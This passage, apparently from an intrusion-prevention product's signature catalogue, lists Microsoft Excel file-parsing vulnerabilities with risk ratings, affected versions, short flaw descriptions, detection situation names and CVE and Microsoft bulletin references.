sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. The flaw is caused by insufficient checks while parsing Selection Records in Excel files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, causing arbitrary code to be injected and executed in the security context of the currently logged in user. In a successful attack, all instances of the vulnerable Microsoft Excel application terminate, or the application stops responding. This can potentially lead to a loss of data. In a more sophisticated attack, where code injection is successful, the behavior of the target is depends on the intended function of the injected code.

Situation:

File-OLE_Microsoft-Excel-Malformed-Selection-Record-Code-Execution

References:

CVE-2006-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1301

BID-18853
http://www.securityfocus.com/bid/18853

MS06-037
http://technet.microsoft.com/security/bulletin/MS06-037

Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-292-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2007

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
File-OLE_Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261

References:

CVE-2010-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0261

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-292-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2007; Microsoft Excel Viewer

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
File-OLE_Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260

References:

CVE-2010-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0260

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Excel-Memory-Corruption-CVE-2012-1886

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2003; Microsoft Excel 2007; Microsoft Excel 2010; Microsoft Office Compatibility Pack

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

File-OLE_Microsoft-Excel-Memory-Corruption-CVE-2012-1886

References:

CVE-2012-1886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1886

BID-56426
http://www.securityfocus.com/bid/56426

MS12-076
http://technet.microsoft.com/security/bulletin/MS12-076

Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

Vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
File-OLE_Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275

References:

CVE-2011-1275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1275

BID-48160
http://www.securityfocus.com/bid/48160

OSVDB-72923
http://www.osvdb.org/72923

MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045

Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2002; Microsoft Excel 2004 for Mac

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
File-OLE_Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237

References:

CVE-2010-3237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3237

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Excel

Situation:

File-OLE_Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability

References:

CVE-2012-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0185

MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030

Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Open XML File Format Converter; Microsoft Office

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Excel product. The vulnerability is due to insufficient validation of the contents of a NAME record in a crafted Excel document. Remote attackers can exploit this vulnerability by enticing target users to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

HTTP_SS-Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
File-OLE_Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption

References:

CVE-2008-4266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4266

BID-32622
http://www.securityfocus.com/bid/32622

MS08-074
http://technet.microsoft.com/security/bulletin/MS08-074

Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Excel detected

Risk:

High

First detected in:

sgpkg-ips-1774-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to the improper parsing of a crafted Note record. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted Excel file. Successful exploitation would allow the attacker to disclose sensitive information that may help in further attacks.

Situation:

File-OLE_Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382

References:

CVE-2018-8382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8382

Microsoft-Excel-Null-Pointer-DoS

About this vulnerability:

Microsoft Excel Null Pointer DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-674-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2003

Type:

Null Pointer Dereference

Description:

A vulnerability exists in Microsoft Excel 2003 which allows remote attackers to cause a denial of service condition by sending an XML file with a corrupted XML or XMS format, which triggers a NULL pointer dereference.

Situation:

SMTP_CS-Microsoft-Excel-Null-Pointer-DoS

References:

CVE-2007-1239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1239

BID-22717
http://www.securityfocus.com/bid/22717

Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Excel

Situation:

File-OLE_Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability

References:

CVE-2012-0142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0142

BID-53373
http://www.securityfocus.com/bid/53373

MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030

Microsoft-Excel-Office-Drawing-Layer-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Excel. The vulnerability is due to a use-after-free error while handling sOffice drawing objects. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

File-OLE_Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977

References:

CVE-2011-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0977

MS11-023
http://technet.microsoft.com/security/bulletin/MS11-023

Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Input Validation

Description:

Vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274

References:

CVE-2011-1274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1274

MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045

Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability

References:

CVE-2011-1987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1987

MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072

Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Excel detected

Risk:

High

First detected in:

sgpkg-ips-1774-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to the inclusion of uninitialized memory when processing of parsed expressions in FORMULA records in Excel workbooks. A remote attacker could exploit this vulnerability by enticing an user to open a maliciously crafted Excel file. Successful exploitation would allow the attacker to disclose sensitive information that may help in further attacks. The vendor, Microsoft, has released the following advisory regarding the vulnerability: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8246

Situation:

File-OLE_Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246

References:

CVE-2018-8246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8246

Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to lack of validation on the PtgExtraArray data structure when parsing a crafted Excel file. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target system by enticing a user to open a maliciously crafted file. In situations where code execution is successful the injected code will run within the security context of the currently logged in user. If code execution fails, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
File-OLE_Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption

References:

CVE-2010-3239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3239

BID-43654
http://www.securityfocus.com/bid/43654

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2002; Microsoft Excel 2007; Microsoft Excel Viewer

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
File-OLE_Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240

References:

CVE-2010-3240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3240

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-292-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2002

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257

References:

CVE-2010-0257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0257

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Excel detected

Situation:

File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403

References:

CVE-2011-3403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3403

MS11-096
http://technet.microsoft.com/security/bulletin/MS11-096

Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-347-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2002

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
File-OLE_Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230

References:

CVE-2010-3230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3230

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-01010

Risk:

Moderate

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
File-OLE_Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101

References:

CVE-2011-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0101

BID-47243
http://www.securityfocus.com/bid/47243

OSVDB-71766
http://www.osvdb.org/71766

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-Rept-Function-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office Compatibility Pack; Microsoft Office SharePoint Server; Microsoft Open XML File Format Converter; Microsoft Office; Microsoft Office System

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of Excel documents containing specially crafted REPT function. Remote attackers can exploit this vulnerability by enticing target users to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-Rept-Function-Integer-Overflow
File-OLE_Microsoft-Excel-Rept-Function-Integer-Overflow
File-TextId_Microsoft-Excel-Rept-Function-Integer-Overflow

References:

CVE-2008-4019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4019

BID-31706
http://www.securityfocus.com/bid/31706

MS08-057
http://technet.microsoft.com/security/bulletin/MS08-057

Microsoft-Excel-Rich-Text-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Excel Viewer

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Microsoft Excel. The vulnerability is due to boundary error when processing SST records. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged-in user.

Situation:

File-OLE_Microsoft-Excel-Rich-Text-Handling-Code-Execution

References:

CVE-2008-0116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0116

BID-28168
http://www.securityfocus.com/bid/28168

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Excel. The memory corrution happens when Excel attempts to open files that contain invalid values within the rtWindow1 records. A remote attacker can exploit this vulnerability by persuading a target user to open a specially crafted XLS file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

Situation:

HTTP_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
File-OLE_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution

References:

CVE-2007-3029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3029

BID-22555
http://www.securityfocus.com/bid/22555

OSVDB-35958
http://www.osvdb.org/35958

MS07-036
http://technet.microsoft.com/security/bulletin/MS07-036

Microsoft-Excel-Security-Feature-Bypass

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Excel detected

Risk:

High

First detected in:

sgpkg-ips-1402-5242

Last changed:

sgpkg-ips-1402-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Excel detected.

Situation:

File-TextId_Microsoft-Excel-Security-Feature-Bypass

References:

CVE-2021-42292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42292

Microsoft-Excel-SerAuxErrBar-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Excelr

Risk:

High

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Excel 2003; Microsoft Excel 2007; Microsoft Excel 2010; Microsoft Excel 2008 for Mac; Microsoft Office Compatibility Pack

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

File-OLE_Microsoft-Excel-SerAuxErrBar-Heap-Overflow

References:

CVE-2012-1885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1885

BID-56425
http://www.securityfocus.com/bid/56425

OSVDB-87270
http://www.osvdb.org/87270

MS12-076
http://technet.microsoft.com/security/bulletin/MS12-076

Microsoft-Excel-Set-Font-Handling-Code-Execution

About this vulnerability:

A buffer overflow vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in Microsoft Excel. The vulnerability is a result of insufficient boundary checking while processing FBI (Font Basis Info) record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

File-OLE_Microsoft-Excel-Set-Font-Handling-Code-Execution

References:

CVE-2007-1203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1203

BID-23779
http://www.securityfocus.com/bid/23779

OSVDB-34394
http://www.osvdb.org/34394

MS07-023
http://technet.microsoft.com/security/bulletin/MS07-023

Microsoft-Excel-SLK-Payload-Delivery

About this vulnerability:	A vulnerability in Microsoft Excel
Risk:	High
First detected in:	sgpkg-ips-1156-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Excel
Type:	Insecure Configuration
Description:	A vulnerability in Microsoft Excel that allows remote attackers to download and execute malicious payloads on target systems by enticing the user to open an .SKL Excel spreadsheet containing Powershell commands.
Situation:	File-Text_Microsoft-Excel-SLK-Payload-Delivery

Microsoft-Excel-Sst-Invalid-Length-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Excelr

Risk:

High

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Excel 2008 for Mac; Microsoft Excel 2011 for Mac; Microsoft Excel 2003; Microsoft Excel 2007; Microsoft Excel 2010; Microsoft Office Compatibility Pack

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

File-OLE_Microsoft-Excel-Sst-Invalid-Length-Use-After-Free

References:

CVE-2012-1887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1887

BID-56430
http://www.securityfocus.com/bid/56430

OSVDB-87272
http://www.osvdb.org/87272

MS12-076
http://technet.microsoft.com/security/bulletin/MS12-076

Microsoft-Excel-Style-Record-Data-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Office

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of the Style record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
File-OLE_Microsoft-Excel-Style-Record-Data-Handling-Code-Execution

References:

CVE-2008-0114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0114

BID-28166
http://www.securityfocus.com/bid/28166

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

Microsoft-Excel-SXLI-Record-Memory-Corruption-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1396-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Excel

References:

CVE-2012-0184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0184

BID-53375
http://www.securityfocus.com/bid/53375

MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030

Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-320-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
HTTP_SS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
File-OLE_Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821

References:

CVE-2010-0821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0821

BID-40518
http://www.securityfocus.com/bid/40518

OSVDB-65227
http://www.osvdb.org/65227

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. The flaw is due to improper handling of crafted XLS documents. An attacker can persuade the target user to open a malicious XLS document to exploit this vulnerability. Successful attack could allow for arbitrary code injection and execution with privileges of the currently logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

File-OLE_Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption

References:

CVE-2008-4265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4265

BID-32618
http://www.securityfocus.com/bid/32618

MS08-074
http://technet.microsoft.com/security/bulletin/MS08-074

Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Excel. The vulnerability is due to a type mismatch during Series record parsing. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted Excel document. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user.

Situation:

File-OLE_Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption

References:

CVE-2012-1847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1847

OSVDB-81724
http://www.osvdb.org/81724

MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030

Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1396-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability

References:

CVE-2011-1986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1986

MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072

Microsoft-Excel-Version-Information-Handling-Code-Execution

About this vulnerability:

Memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is a result of insufficient data validation while processing the Version Number field in a BOF record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_Microsoft-Excel-Version-Information-Handling-Code-Execution
File-OLE_Microsoft-Excel-Version-Information-Handling-Code-Execution

References:

CVE-2007-1756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1756

BID-24801
http://www.securityfocus.com/bid/24801

OSVDB-35957
http://www.osvdb.org/35957

MS07-036
http://technet.microsoft.com/security/bulletin/MS07-036

Microsoft-Excel-Window2-Record-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-425-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel

Type:

Malfunction

Description:

A code execution vulnerability has been identified in Microsoft Excel. The vulnerability is due to an use after free error while parsing Window2 record in Excel files. The vulnerability can be exploited by enticing a user to open a crafted file and perform certain actions. If exploited successfully, the vulnerability could permit execution of arbitrary code in the security context of the target user. At the time of writing, no patch or advisory regarding this issue is available from Microsoft.

Situation:

File-OLE_Microsoft-Excel-Window2-Record-Use-After-Free

References:

OSVDB-76840
http://www.osvdb.org/76840

Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is a result of insufficient data validation while processing the SubStreamType field in a BOF record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

